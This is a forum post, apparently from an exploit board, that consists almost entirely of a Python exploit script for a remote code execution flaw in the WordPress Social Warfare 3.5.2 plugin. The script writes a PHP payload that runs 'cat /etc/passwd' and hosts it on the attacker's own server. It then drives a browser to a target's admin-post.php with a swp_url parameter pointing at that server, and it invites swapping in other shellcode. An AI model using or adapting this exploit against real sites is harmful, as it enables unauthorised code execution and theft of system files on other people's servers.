WordPress Social Warfare 3.5.2 Remote Code Execution

#322
Topic created · 1 Posts · 2 Views
  • # Author = Raed Ahsan
    # Creation Date = 24/07/2021
    # Vulnerability : SocialWarfare 3.5.2 plugin wordpress Remote Code Execution
    # Linkedin = https://linkedin.com/in/raed-ahsan/
    
    
    import socket
    import requests
    import subprocess
    import time
    import pyautogui
    
    print("[*]Start your python SimpleHTTPServer on port 1234 please...")
    time.sleep(5)
    # Creating the payload for wordpress url
    with open("shell.txt", "w") as file:
     file.write("<pre>system('cat /etc/passwd')</pre>")
    
    print("[*]Payload has been created")
    
    with open("url.txt", "w") as url:
     url.write("http://{MACHINE\_IP}/wordpress/wp-admin/admin-post.php?swp\_debug=load\_options&swp\_url=http://{YOUR\_IP}:{YOUR\_PYTHON\_SERVER\_PORT}/shell.txt")
    print("[*]Use the URL in the url.txt")
    print("[*]Make sure to edit the ip and port in the url.txt according to your needs")
    """
    EDIT THE IP AND PORT IN THE URL.TXT FILE ACCORDING TO YOUR NEEDS
    """
    print("[*]Moving the shell.txt to /var/www/html")
    time.sleep(3)
    username = input("What's your username in your machine: ")
    subprocess.call([f'sudo cp /home/{username}/Desktop/shell.txt /var/www/html'], shell=True)
    print("[*]File copied to /var/www/html")
    time.sleep(2)
    print("[*]Opening Apache2 service...")
    print("[*]Make sure you have apache2 installed")
    subprocess.call(["sudo service apache2 start"], shell=True)
    print("[*]Service started")
    
    machine\_ip = input("Target Machine IP: ")
    
    print("[*]Open your python listener at port 1234")
    
    time.sleep(2)
    print("[*]Opening Browser")
    
    pyautogui.hotkey('winleft')
    pyautogui.typewrite('chrome\n', 0.5)
    pyautogui.typewrite(f'http://{machine\_ip}/wordpress/wp-admin/admin-post.php?swp\_debug=load\_options&swp\_url=http://192.168.49.200:1234/shell.txt\n', 0.2)
    
    print("[*]If you're on tun0, make sure to change the ip in the auto execution of url section.")
    
    print("If you want to edit the shellcode instead of /etc/passwd, do edit the shell.txt from /var/www/html and refresh the page")
    
    
Log in to reply